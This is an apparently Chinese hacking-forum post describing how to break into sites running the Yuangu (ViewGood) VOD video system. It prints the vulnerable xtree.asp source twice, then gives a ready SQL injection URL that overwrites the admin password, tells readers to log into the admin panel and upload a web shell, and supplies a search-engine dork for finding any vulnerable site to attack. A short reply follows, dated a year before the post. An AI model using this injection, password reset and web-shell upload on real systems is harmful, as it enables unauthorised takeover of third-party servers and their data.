服务器维护,服务器代维,安全设置,漏洞扫描,入侵检测服务

dirtysea 发表于 2007-10-9 19:54:56

最新远古VOD点播影视系统模板入侵

<P>漏洞文件webmedia/common/function/xtree.asp<BR>〈!--#include file="../dbcon.inc.asp" --&gt;<BR>〈%<BR>iNode_ID = Request.QueryString("id")<BR>if Len(Session("SuperAdmin")) &gt; 0 or Len(Session("LIVEAdmin")) &gt; 0 or Len(Session</P>
<P>("VODAdmin")) &gt; 0 then<BR>szSQL = "Select Type_ID,ParentID,TypeName FROM TypeInfo Where Type_ID&gt;=20 AND ParentID=" &amp; </P>
<P>iNode_ID<BR>else<BR>szSQL = "Select Type_ID,ParentID,TypeName FROM TypeInfo Where Type_ID&gt;20 AND ParentID=" &amp; </P>
<P>iNode_ID<BR>end if<BR>rsData.Open szSQL,con,1,3<BR>szRetVar = "&lt;?xml version='1.0' encoding='GB2312'?&gt;&lt;Root&gt;"<BR>do while not rsData.EOF<BR>szRetVar = szRetVar &amp; "&lt;TypeInfo&gt;"<BR>szRetVar = szRetVar &amp; "&lt;IDN&gt;" &amp; rsData("Type_ID") &amp; "&lt;/IDN&gt;"<BR>szRetVar = szRetVar &amp; "&lt;ParentID&gt;" &amp; rsData("ParentID") &amp; "&lt;/ParentID&gt;"<BR>szRetVar = szRetVar &amp; "&lt;TypeName&gt;" &amp; Replace(rsData("TypeName"), "&amp;", "&amp;") &amp; "&lt;/TypeName&gt;"<BR>szRetVar = szRetVar &amp; "&lt;/TypeInfo&gt;"<BR>rsData.MoveNext<BR>loop<BR>szRetVar = szRetVar &amp; "&lt;/Root&gt;"<BR>rsData.Close<BR>Response.CharSet = "GB2312"<BR>Response.C<BR>Response.Expires = -1<BR>Response.Write szRetVar<BR>%&gt;<BR>〈!--#include file="../dbend.inc.asp" --&gt;<BR>〈!--#include file="../dbcon.inc.asp" --&gt;<BR>〈%<BR>iNode_ID = Request.QueryString("id")<BR>if Len(Session("SuperAdmin")) &gt; 0 or Len(Session("LIVEAdmin")) &gt; 0 or Len(Session</P>
<P>("VODAdmin")) &gt; 0 then<BR>szSQL = "Select Type_ID,ParentID,TypeName FROM TypeInfo Where Type_ID&gt;=20 AND ParentID=" &amp; </P>
<P>iNode_ID<BR>else<BR>szSQL = "Select Type_ID,ParentID,TypeName FROM TypeInfo Where Type_ID&gt;20 AND ParentID=" &amp; </P>
<P>iNode_ID<BR>end if<BR>rsData.Open szSQL,con,1,3<BR>szRetVar = "&lt;?xml version='1.0' encoding='GB2312'?&gt;&lt;Root&gt;"<BR>do while not rsData.EOF<BR>szRetVar = szRetVar &amp; "&lt;TypeInfo&gt;"<BR>szRetVar = szRetVar &amp; "&lt;IDN&gt;" &amp; rsData("Type_ID") &amp; "&lt;/IDN&gt;"<BR>szRetVar = szRetVar &amp; "&lt;ParentID&gt;" &amp; rsData("ParentID") &amp; "&lt;/ParentID&gt;"<BR>szRetVar = szRetVar &amp; "&lt;TypeName&gt;" &amp; Replace(rsData("TypeName"), "&amp;", "&amp;") &amp; "&lt;/TypeName&gt;"<BR>szRetVar = szRetVar &amp; "&lt;/TypeInfo&gt;"<BR>rsData.MoveNext<BR>loop<BR>szRetVar = szRetVar &amp; "&lt;/Root&gt;"<BR>rsData.Close<BR>Response.CharSet = "GB2312"<BR>Response.C<BR>Response.Expires = -1<BR>Response.Write szRetVar<BR>%&gt;<BR>〈!--#include file="../dbend.inc.asp" --&gt;<BR>很容易看出以上存在着DB权限注入 <BR>注射地址:<A href="http://WWWW.XXXXX.COM/webmedia/common/function/xtree.asp?id=1" target=_blank>http://WWWW.XXXXX.COM/webmedia/common/function/xtree.asp?id=1</A><BR>表段名:customer<BR>构造函数 把admin的pass改成fuck <BR><A href="http://WWWW.XXXXX.COM/webmedia/common/function/xtree.asp?id=1;update%20customer%20set%20UserPass='633f94d350db34d5'%20where%20UserName='admin'" target=_blank>http://WWWW.XXXXX.COM/webmedia/common/function/xtree.asp?id=1;update%20customer%20set%20UserPass='633f94d350db34d5'%20where%20UserName='admin'</A><BR><BR>登陆后台<A href="http://WWWW.XXXXX.COM/webmedia/admin/default.asp" target=_blank>http://WWWW.XXXXX.COM/webmedia/admin/default.asp</A>&nbsp;直接上传大马 完事!<BR>测试方法:在google baidu搜:&nbsp;&nbsp;&nbsp; inurL:webmedia/&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 随便找个站都可以入侵<BR>官方地址:<A href="http://www.viewgood.com/" target=_blank>http://www.viewgood.com/</A></P>

wuqing 发表于 2006-6-2 22:55:43

re:最新远古VOD点播影视系统模板入侵

<P>理解 你的心情!</P>
页: [1]
查看完整版本: 最新远古VOD点播影视系统模板入侵